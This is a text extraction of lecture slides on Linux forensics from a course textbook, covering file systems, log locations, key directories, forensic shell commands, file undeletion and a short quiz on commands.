More Related Content
Similar to Forensic3e ppt ch09
Similar to Forensic3e ppt ch09 (20)
More from Skillspire LLC (20)
Forensic3e ppt ch09
- 1. © 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
System Forensics,
Investigation, and Response
Lesson 9
Linux Forensics
- 2. Page 2
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Learning Objective
Understand the fundamentals of Linux.
Understand how to extricate data from a Linux
computer.
- 3. Page 3
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Key Concepts
Linux file systems
What to look for in Linux system logs
Forensically interesting Linux directories
Important Linux shell commands
How to undelete files from Linux
- 4. Page 4
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
History of Linux
1969
UNIX
created
1972
UNIX
released
1983
GNU
- 5. Page 5
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
History of Linux (Cont.)
1987
Minix
1991
Linux
2017
Hundreds
of Linux
distros
- 6. Page 6
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Shells
Bourne shell (sh)
Bourne-again shell (Bash)
C shell (csh)
Korn shell (ksh)
- 7. Page 7
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Common Linux Shell Commands
- 8. Page 8
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Common Linux Shell Commands
(Cont.)
- 9. Page 9
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Common Linux Shell Commands
(Cont.)
- 10. Page 10
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
GNU Network Object Model
Environment (GNOME)
Courtesy
of
The
GNOME
Project
- 11. Page 11
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
K Desktop Environment
(KDE)/Plasma
Courtesy
of
TKDE
- 12. Page 12
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Other Linux GUIs
Common Desktop Environment (CDE)
• Originally developed in 1994 for UNIX
systems
• Based on HP’s Visual User Environment
(VUE)
Enlightenment
• Relatively new
• Designed for graphics developers
- 13. Page 13
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Boot Process
Kernel
Initializes devices
Real mode to protected
mode
MBR
GRUB LILO
BIOS
POST
- 14. Page 14
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Boot Process (Cont.)
Runlevels
INIT
- 15. Page 15
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Run Levels
- 16. Page 16
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Logical Volume Manager
An abstraction layer that provides volume
management for the Linux kernel
On a single system (like a single desktop or
server), primary role is to allow:
• The resizing of partitions
• The creation of backups by taking
snapshots of the logical volumes
- 17. Page 17
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Distributions
Open source operating system
Popular distributions:
• Ubuntu
• Red Hat Enterprise Linux (RHEL)
• OpenSUSE
• Fedora
• Debian
• Slackware
- 18. Page 18
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux File Systems
Extended File System (ext)
• Current version is 4
ext4 supports volumes up to 1 exabyte and
single files up to 16 terabytes
ext3 and ext4 support three types of
journaling:
• journal (most secure)
• ordered
• writeback (least secure)
- 19. Page 19
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux File Systems (Cont.)
Reiser File System
• Supports journaling
• Performs well when hard disk has large
number of smaller files
Berkeley Fast File System
• Also known as UNIX File System
• Developed at UC-Berkeley for Linux
• Uses a bitmap to track free clusters,
indicating availability
- 20. Page 20
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Logs
Log Contents
/var/log/faillog Failed user logins
/var/log/kern.log Messages from the operating
system’s kernel
/var/log/lpr.log Items that have been printed
/var/log/mail.* Email activity
/var/log/mysql.* MySQL database server activity
- 21. Page 21
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Logs (Cont.)
Log Contents
/var/log/apache2/* Apache web server activity
/var/log/lighttpd/* Lighttpd web server activity
/var/log/apport.log Application crashes
Intrusion detection
system logs
Suspicious traffic
- 22. Page 22
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Viewing Logs
Text editor in GUI
Any of these commands work from the
shell:
• dmesg | lpr
• # tail -f /var/log/lpr.log
• # less /var/log/ lpr.log
• # more -f /var/log/ lpr.log
- 23. Page 23
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Linux Directories
Key directories are important to the
functioning of every operating system
Directories are also important places to
seek out evidence in an investigation
- 24. Page 24
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/root
Home directory for the root user
• Contains data for the administrator
Linux root user is equivalent to Windows
Administrator
- 25. Page 25
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
The /bin Directory
- 26. Page 26
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/sbin
Similar to /bin
Contains binary files not intended for the
average computer user
- 27. Page 27
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/etc
Contains configuration files, such as for
web servers, boot loaders, security
software, and many other applications
- 28. Page 28
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/etcinittab File
Sets boot-up process and operation
• Example: init level for the system on start-up
label run_level action:a process
boot bootwait initdefault sysinit
- 29. Page 29
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/dev
Contains device files
• Interfaces to devices
All devices should have a device file in /dev
Device naming conventions:
• hd = hard drive
• fd = floppy drive
• cd = CD
• Example: Main hard drive can be /dev/hd0
- 30. Page 30
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/mnt
Many devices are mounted in /mnt
Drives must be mounted prior to use
Checking this directory lets you know what
is currently mounted on system
- 31. Page 31
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/boot
Contains files critical for booting
Boot loader (LILO or GRUB) looks in this
directory
Kernel images commonly located in /boot
- 32. Page 32
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/usr
Contains subdirectories for individual users
- 33. Page 33
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
/var and /varspool
/var
• Contains data that is changed during
system operation
/varspool
• Contains the print queue
- 34. Page 34
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
The /proc Directory
- 35. Page 35
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Shell Commands for Forensics
Linux has hundreds of shell commands
Some can be very useful in forensic
investigations
- 36. Page 36
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
The dmesg Command
- 37. Page 37
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
The pstree Command
- 38. Page 38
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
The file Command
- 39. Page 39
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Undeleting Linux Files: Manually
Move system to single-user mode
Use grep or similar command
Example: grep -b ‘search-text’
/dev/partition > file.txt
Use command-line editor to view file
- 40. Page 40
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Let’s Play:
Identify the Shell Command
- 41. Page 41
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 1
Displays the commands that have
previously been entered
Answer choices:
a. dmesg
b. grep
c. history
d. ls
- 42. Page 42
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 1
history
- 43. Page 43
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 2
Shows all the processes in the form of a
tree structure
Answer choices:
a. ps
b. pstree
c. ls
d. top
- 44. Page 44
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 2
pstree
- 45. Page 45
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 3
Takes the name you provide and returns
the ID for that process; can work with
partial names
Answer choices:
a. pgrep
b. dd
c. grep
d. file
- 46. Page 46
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 3
pgrep
- 47. Page 47
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 4
Lists the processes in the order of how
much CPU time the process is utilizing
Answer choices:
a. ps
b. ls
c. su
d. top
- 48. Page 48
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 4
top
- 49. Page 49
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 5
A criminal changes a file extension. This
command can identify the file.
Answer choices:
a. history
b. ls
c. file
d. mount
- 50. Page 50
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 5
file
- 51. Page 51
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 6
Halts a running process based on the
process ID (PID) you provide
Answer choices:
a. kill
b. dmesg
c. ps
d. finger
- 52. Page 52
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 6
kill
- 53. Page 53
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 7
Invokes the super user mode
Answer choices:
a. who
b. grep
c. finger
d. su
- 54. Page 54
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 7
su
- 55. Page 55
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Command 8
Provides information about a specific user
Answer choices:
a. finger
b. who
c. su
d. grep
- 56. Page 56
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Answer 8
finger
- 57. Page 57
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Kali Linux
Has a number of forensics tools
Can use as quality control tool to
complement OSForensics, FTK, or Encase
Includes Autopsy, a web-based graphical
user interface for the command-line tool
Sleuth Kit
- 58. Page 58
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Autopsy
- 59. Page 59
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Autopsy (Cont.)
- 60. Page 60
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Autopsy (Cont.)
- 61. Page 61
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Autopsy (Cont.)
- 62. Page 62
System Forensics, Investigation, and Response
© 2019 Jones and Bartlett Learning, LLC, an Ascend Learning Company
www.jblearning.com
All rights reserved.
Summary
Linux file systems
What to look for in Linux system logs
Forensically interesting Linux directories
Important Linux shell commands
How to undelete files from Linux